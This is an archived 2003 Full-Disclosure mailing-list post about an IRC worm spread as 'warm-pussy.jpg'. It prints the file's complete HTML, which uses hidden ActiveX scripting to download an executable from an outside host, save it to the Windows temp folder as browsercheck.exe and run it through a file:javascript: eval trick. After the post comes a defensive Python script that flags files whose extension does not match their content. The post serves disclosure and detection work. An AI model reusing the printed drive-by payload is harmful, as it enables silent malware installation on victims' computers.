From: segfault at nycap.rr.com (segfault)
Subject: new worm - "warm-pussy.jpg".

You idiot.  Just because a file is called warm-pussy.jpg, doesn't mean that
the webserver it resides on isn't going to parse its actual content (which
is probably plaintext).  Look again, I'm sure you'll be surprised.

Contents of warm-pussy.jpg:

<html>
<head>
</head>
<body onLoad="doit()">
<p>
  <textarea id="code" style="display: none;">
s=new ActiveXObject("ADODB.Stream");
s.Mode=3;
s.Type=1;
s.Open();
x=new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET","http://vnm.musx.net/moep.exe",0);
x.Send();
s.Write(x.responseBody);
s.SaveToFile("C:\\windows\\temp\\browsercheck.exe",2);
</textarea>
  <textarea id="code2" style="display: none;">
md="&lt;object id=\"oFile\""+
    " classid=\"clsid:11111111-1111-1111-1111-111111111111\""+
    " codebase=\"c:/windows/temp/browsercheck.exe\"&gt;&lt;/object&gt;";
w=createPopup();
w.document.clear();
w.document.write(md);
</textarea>
  <script language="javascript">
    function preparecode(code) {
        result = '';
        lines = code.split(/\r\n/);
        for (i=0;i<lines.length;i++) {
            line = lines[i];
            line = line.replace(/^\s+/,"");
            line = line.replace(/\s+$/,"");
            line = line.replace(/[\\]/g,"\\\\");
            line = line.replace(/'/g,"\\'");
            line = line.replace(/"/g,"\\\"");
            line = line.replace(/[/]/g,"%2f");
            line = line.replace(/\r\n/,"");
            line += ' ';
            if (line != '') {
                result += line;
            }
        }
        return result;
    }
    function weiter() {
        open(myURL,"_search");
    }
    function starten(thecode) {
        mycode = preparecode(thecode);
        myURL = "file:javascript:eval('" + mycode + "')";
        open("http:///","_search");
        setTimeout("weiter()", 500);
    }
    function doit() {
    starten(document.all.code.value);
    setTimeout("doit2()", 600);
    }
    function doit2() {
    starten(document.all.code2.value);
    }
</script>
</p>
<p>&nbsp;</p>
<p><br>
</p>
<p></p>
<p> <img src="nice_warm_pussy.jpg" width="640" height="480"><br>
</p>
<p><br>
</p>
</body>
</html>

----- Original Message ----- 
From: "Tom Russell" <kalleth@...dram.co.uk>
To: <full-disclosure@...ts.netsys.com>
Sent: Wednesday, November 12, 2003 1:34 PM
Subject: [Full-Disclosure] new worm - "warm-pussy.jpg".


> Manifests itself in an infected victim by saying over IRC (mIRC it seems):
>
> 1824.11| [inx-dj|eJ-Kevin] rofl wie geil, gibt euch das :)) http://
> vnm.musx.net /warm-pussy.jpg <--- einfach geil !
>
> (spaces added to guard against accidental infection)
> It is unknown at this time whether this is another variant of
> irc.trojan.fgt.
> The files used in this worm can be obtained at
> http://kalleth.2tone-dev.com/fd/warm-pussy.rar in unaltered form - be
> careful what you do with them.
>
> (i take no responsibility for accidental infection.)
>
> Regards,
> Tom Russell,
> 2tone:development (www.2tone-dev.com)
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>
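As an added illustration of the point made above (example code written for this archive page, not code from the thread or from either poster), a triage check that compares what a filename claims with what its bytes actually contain, flagging the ActiveX/XMLHTTP indicators visible in the posted sample. The sample inputs below are constructed, not the real files.

```python
import os

# JPEG files begin with the SOI marker FF D8 FF; anything else is not a JPEG.
JPEG_MAGIC = b"\xff\xd8\xff"
IMAGE_EXTS = {".jpg", ".jpeg"}

# Markers of HTML content, plus the ActiveX/XMLHTTP calls the posted sample
# uses to fetch an executable and write it under the Windows temp directory.
HTML_MARKERS = (b"<html", b"<script", b"<body", b"<textarea")
SCRIPT_INDICATORS = (b"ActiveXObject", b"ADODB.Stream", b"Microsoft.XMLHTTP",
                     b"SaveToFile", b"classid=")


def triage_file(name: str, data: bytes) -> dict:
    """Compare what the filename claims with what the bytes contain.

    Returns the per-check results and a list of reasons; an empty list
    means nothing contradicted the claimed type.
    """
    ext = os.path.splitext(name)[1].lower()
    head = data[:4096].lower()
    claims_image = ext in IMAGE_EXTS
    is_jpeg = data.startswith(JPEG_MAGIC)
    looks_like_html = any(m in head for m in HTML_MARKERS)
    found = [i.decode() for i in SCRIPT_INDICATORS if i in data]

    reasons = []
    if claims_image and not is_jpeg:
        reasons.append(f"extension {ext} but no JPEG magic bytes")
    if claims_image and looks_like_html:
        reasons.append("image extension but body is HTML markup")
    if found:
        reasons.append("script indicators: " + ", ".join(found))
    return {"name": name, "is_jpeg": is_jpeg, "looks_like_html": looks_like_html,
            "indicators": found, "reasons": reasons,
            "verdict": "flag" if reasons else "ok"}


# Constructed inputs (not the real files): a trimmed HTML body carrying the
# same ActiveX calls as the posted page, and a minimal JFIF header.
FAKE_JPG = (b'<html>\n<body onLoad="doit()">\n'
            b'<textarea id="code" style="display: none;">\n'
            b's=new ActiveXObject("ADODB.Stream");\n'
            b'x=new ActiveXObject("Microsoft.XMLHTTP");\n'
            b's.SaveToFile("C:\\\\windows\\\\temp\\\\browsercheck.exe",2);\n'
            b'</textarea></body></html>')
REAL_JPG = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01\x00" + b"\x00" * 32

if __name__ == "__main__":
    for fname, blob in (("warm-pussy.jpg", FAKE_JPG), ("photo.jpg", REAL_JPG)):
        r = triage_file(fname, blob)
        print(fname, r["verdict"], r["reasons"])
```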
